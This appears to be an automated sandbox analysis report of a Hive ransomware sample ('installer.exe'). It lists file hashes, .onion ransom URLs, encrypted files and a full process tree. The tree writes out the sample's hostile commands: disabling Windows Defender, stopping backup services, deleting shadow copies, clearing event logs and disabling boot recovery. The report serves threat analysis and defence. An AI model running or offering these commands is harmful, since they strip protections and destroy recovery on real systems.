Analysis

Max time kernel: 127s
Max time network: 120s
Platform: windows7_x64
Resource: win7-en-20211208
Submitted: 05-01-2022 07:36
Static task: static1
Behavioral task: behavioral1 (sample: installer.exe, resource: win7-en-20211208)
Behavioral task: behavioral2 (sample: installer.exe, resource: win10-en-20211208)
General

Target: installer.exe
Size: 3.8MB
MD5: 32bd8e6843879a761e6fa9436a90bb66
SHA1: 26dde522d6f3f87ac982495028494c7f50799696
SHA256: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
SHA512: c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f
Malware Config

Extracted from: C:\Program Files\7-Zip\rFSH_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the mpcmdrun utility to delete all AV definitions.
Processes: MpCmdRun.exe (PID 1616)

Hive
A ransomware written in Golang, first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes: reg.exe
  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes: bcdedit.exe (PID 1524), bcdedit.exe (PID 1588)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Processes: installer.exe (every entry below is attributed to installer.exe)
File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\avtransport.xml
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGLINACC.DPV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\gadget.xml
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\rFSH_HOW_TO_DECRYPT.txt
File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS01635_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR33F.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\rFSH_HOW_TO_DECRYPT.txt
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-bullet.png
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21390_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\form_edit.js.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18234_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File created C:\Program Files\Java\jre7\lib\zi\Australia\rFSH_HOW_TO_DECRYPT.txt
File opened for modification C:\Program Files\Common Files\System\msadc\handler.reg
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png
File opened for modification C:\Program Files\DVD Maker\Shared\Parity.fx
File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\chkrzm.exe.mui.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\HICCUP.WAV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Windows Media Player\Skins\Revert.wmz
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10337_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR41F.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\js\cpu.js
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER.DPV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.png
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png
File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Proof.fr\rFSH_HOW_TO_DECRYPT.txt
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.INF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PID 1476)

Opens file in notepad (likely ransom note) (1 IoC)
Processes: notepad.exe (PID 2512)

Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: powershell.exe (PID 2080), powershell.exe (PID 2172), installer.exe (PID 952)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (token enabled, by process and PID, in the order the report lists them):
wevtutil.exe (PID 1580): SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (PID 820): SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (PID 1456): SeSecurityPrivilege, SeBackupPrivilege
wmic.exe (PID 1908): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
wmic.exe (PID 1072): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
wmic.exe (PID 1072), second block of entries: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source PID wrote to memory of target PID; the report lists each entry three times unless noted):
PID 952 (installer.exe) wrote to memory of 1608 (net.exe)
PID 1608 (net.exe) wrote to memory of 1444 (net1.exe)
PID 952 (installer.exe) wrote to memory of 520 (net.exe)
PID 520 (net.exe) wrote to memory of 588 (net1.exe)
PID 952 (installer.exe) wrote to memory of 288 (net.exe)
PID 288 (net.exe) wrote to memory of 1372 (net1.exe)
PID 952 (installer.exe) wrote to memory of 1376 (net.exe)
PID 1376 (net.exe) wrote to memory of 860 (net1.exe)
PID 952 (installer.exe) wrote to memory of 1148 (net.exe)
PID 1148 (net.exe) wrote to memory of 1472 (net1.exe)
PID 952 (installer.exe) wrote to memory of 428 (net.exe)
PID 428 (net.exe) wrote to memory of 1660 (net1.exe)
PID 952 (installer.exe) wrote to memory of 1152 (net.exe)
PID 1152 (net.exe) wrote to memory of 1524 (net1.exe)
PID 952 (installer.exe) wrote to memory of 1868 (net.exe)
PID 1868 (net.exe) wrote to memory of 1460 (net1.exe)
PID 952 (installer.exe) wrote to memory of 1940 (sc.exe)
PID 952 (installer.exe) wrote to memory of 1136 (sc.exe)
PID 952 (installer.exe) wrote to memory of 296 (sc.exe)
PID 952 (installer.exe) wrote to memory of 1768 (sc.exe)
PID 952 (installer.exe) wrote to memory of 1064 (sc.exe)
PID 952 (installer.exe) wrote to memory of 1792 (sc.exe) (listed once; the list ends at the 64th IoC)
Processes (indentation shows parent/child depth in the process tree; signatures triggered by a process are listed under it)

C:\Users\Admin\AppData\Local\Temp\installer.exe [PID 952]
  cmd: "C:\Users\Admin\AppData\Local\Temp\installer.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe [PID 1608]
      cmd: net.exe stop "NetMsmqActivator" /y
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe [PID 1444]
          cmd: C:\Windows\system32\net1 stop "NetMsmqActivator" /y

    C:\Windows\system32\net.exe [PID 520]
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe [PID 588]
          cmd: C:\Windows\system32\net1 stop "SamSs" /y

    C:\Windows\system32\net.exe [PID 288]
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe [PID 1372]
          cmd: C:\Windows\system32\net1 stop "SDRSVC" /y

    C:\Windows\system32\net.exe [PID 1376]
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe [PID 860]
          cmd: C:\Windows\system32\net1 stop "SstpSvc" /y

    C:\Windows\system32\net.exe [PID 1148]
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe [PID 1472]
          cmd: C:\Windows\system32\net1 stop "UI0Detect" /y

    C:\Windows\system32\net.exe [PID 428]
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe [PID 1660]
          cmd: C:\Windows\system32\net1 stop "VSS" /y

    C:\Windows\system32\net.exe [PID 1152]
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe [PID 1524]
          cmd: C:\Windows\system32\net1 stop "wbengine" /y

    C:\Windows\system32\net.exe [PID 1868]
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe [PID 1460]
          cmd: C:\Windows\system32\net1 stop "WebClient" /y

    C:\Windows\system32\sc.exe [PID 1940]
      cmd: sc.exe config "NetMsmqActivator" start= disabled

    C:\Windows\system32\sc.exe [PID 1136]
      cmd: sc.exe config "SamSs" start= disabled

    C:\Windows\system32\sc.exe [PID 296]
      cmd: sc.exe config "SDRSVC" start= disabled

    C:\Windows\system32\sc.exe [PID 1768]
      cmd: sc.exe config "SstpSvc" start= disabled

    C:\Windows\system32\sc.exe [PID 1064]
      cmd: sc.exe config "UI0Detect" start= disabled

    C:\Windows\system32\sc.exe [PID 1792]
      cmd: sc.exe config "VSS" start= disabled

    C:\Windows\system32\sc.exe [PID 752]
      cmd: sc.exe config "wbengine" start= disabled

    C:\Windows\system32\sc.exe [PID 1464]
      cmd: sc.exe config "WebClient" start= disabled

    C:\Windows\system32\reg.exe [PID 1684]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

    C:\Windows\system32\reg.exe [PID 1720]
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

    C:\Windows\system32\reg.exe [PID 1584]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 900]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 268]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

    C:\Windows\system32\reg.exe [PID 748]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 544]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 1396]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 1820]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 1668]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 1648]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 2044]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

    C:\Windows\system32\reg.exe [PID 1460]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

    C:\Windows\system32\reg.exe [PID 1800]
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

    C:\Windows\system32\reg.exe [PID 856]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

    C:\Windows\system32\reg.exe [PID 1084]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

    C:\Windows\system32\schtasks.exe [PID 2032]
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

    C:\Windows\system32\schtasks.exe [PID 1332]
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

    C:\Windows\system32\schtasks.exe [PID 1612]
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

    C:\Windows\system32\schtasks.exe [PID 1916]
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

    C:\Windows\system32\schtasks.exe [PID 1144]
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

    C:\Windows\system32\reg.exe [PID 996]
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

    C:\Windows\system32\reg.exe [PID 1372]
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

    C:\Windows\system32\reg.exe [PID 860]
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

    C:\Windows\system32\reg.exe [PID 1492]
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

    C:\Windows\system32\reg.exe [PID 1056]
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

    C:\Windows\system32\reg.exe [PID 940]
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

    C:\Windows\system32\reg.exe [PID 1992]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

    C:\Windows\system32\reg.exe [PID 1892]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

    C:\Windows\system32\reg.exe [PID 1712]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

    C:\Windows\system32\reg.exe [PID 1592]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

    C:\Windows\system32\reg.exe [PID 524]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      - Modifies security service

    C:\Windows\system32\reg.exe [PID 1656]
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

    C:\Windows\system32\vssadmin.exe [PID 1476]
      cmd: vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies

    C:\Windows\system32\wevtutil.exe [PID 1580]
      cmd: wevtutil.exe cl system
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\wevtutil.exe [PID 820]
      cmd: wevtutil.exe cl security
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\wevtutil.exe [PID 1456]
      cmd: wevtutil.exe cl application
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Wbem\wmic.exe [PID 1908]
      cmd: wmic.exe SHADOWCOPY /nointeractive
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Wbem\wmic.exe [PID 1072]
      cmd: wmic.exe shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\bcdedit.exe [PID 1524]
      cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit

    C:\Windows\system32\bcdedit.exe [PID 1588]
      cmd: bcdedit.exe /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit

    C:\Windows\system32\cmd.exe [PID 1704]
      cmd: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

        C:\Program Files\Windows Defender\MpCmdRun.exe [PID 1616]
          cmd: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          - Deletes Windows Defender Definitions

    C:\Windows\system32\cmd.exe [PID 2060]
      cmd: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [PID 2080]
          cmd: powershell Set-MpPreference -DisableIOAVProtection $true
          - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\cmd.exe [PID 2152]
      cmd: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [PID 2172]
          cmd: powershell Set-MpPreference -DisableRealtimeMonitoring $true
          - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\notepad.exe [PID 2512]
      cmd: notepad.exe C:\rFSH_HOW_TO_DECRYPT.txt
      - Opens file in notepad (likely ransom note)

    C:\Windows\system32\cmd.exe [PID 2520]
      cmd: cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\installer.exe"

        C:\Windows\system32\PING.EXE [PID 2544]
          cmd: ping.exe -n 5 127.0.0.1
          - Runs ping.exe
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5: 8f68b6820eee08212f7c3d286720a73d
SHA1: 244247fa3c39d764b091cfd1bbabafc1286e6c85
SHA256: 6cf01622d3007b796c4695d740919203e0cb5c03eb400290aabee7480cebb278
SHA512: fd01b034c1335d705a5162908f2f1cf29494b9784d342a649cc578db7cfdcc2ad7c47869d08d6ce012db67bb30b4c4203952055cac204a8eeb5b157666cf0a8c

Second download (no path shown in the report)
MD5: 9feb836dd50f68cbf9e87dad21a2fbc4
SHA1: f995609d7ea8a22383c8f28e2ac9b657fa767019
SHA256: 773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e
SHA512: 123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748